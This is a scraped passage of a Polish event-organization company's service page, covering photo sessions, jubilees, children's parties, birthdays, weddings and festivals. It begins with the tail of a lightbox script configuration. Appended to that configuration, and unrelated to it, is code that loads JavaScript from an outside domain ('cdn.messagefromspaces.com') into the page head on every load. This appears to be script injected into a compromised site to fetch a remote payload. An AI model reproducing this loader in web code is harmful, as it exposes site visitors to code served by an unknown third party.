, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
 • Organizacja sesji zdjęciowych


  Jeśli masz pomysł na zorganizowanie sesji zdjęciowej, ale nie wiesz jak to wszystko zorganizować, zostaw to nam. Wszystko przygotujemy i dopasujemy do Twoich potrzeb!
 • Jubileusze


  Chcemy pomóc także w organizowaniu ważnych jubileuszy. Pragniesz zorganizować komuś niezapomniany wieczór, który uwieczni jego zasługi i sprawi, że poczuje się wyjątkowy? Będziemy razem z Tobą i wspólnie przygotujemy tę niezwykłą chwilę.
 • Kinderbale  Chętnie organizujemy zabawy dla dzieci. Jeśli chcesz zrobić niezapomniany prezent dla swojej pociechy, zgłoś się do nas!
 • Imprezy urodzinowe


  Pomagamy w organizowaniu ciekawych, oryginalnych i niezapomnianych imprez urodzinowych! Dzięki naszemu wsparciu, Jubilat kolejny rok swojego życia zacznie z uśmiechem i pięknymi wspomnieniami.
 • Wesela

  Jeśli chcesz by ten wielki dzień i wieczór w Twoim życiu był niezapomniany, pełen wrażeń i emocji, podziel się z nami swoją wizją. Obiecujemy doradzić, zaproponować najciekawsze rozwiązania, które przybliżą Twoje plany do realizacji.
 • Festyny

  Nie boimy się dużych przedsięwzięć, dlatego swoją pomoc oferujemy także przy organizowaniu dużych imprez masowych.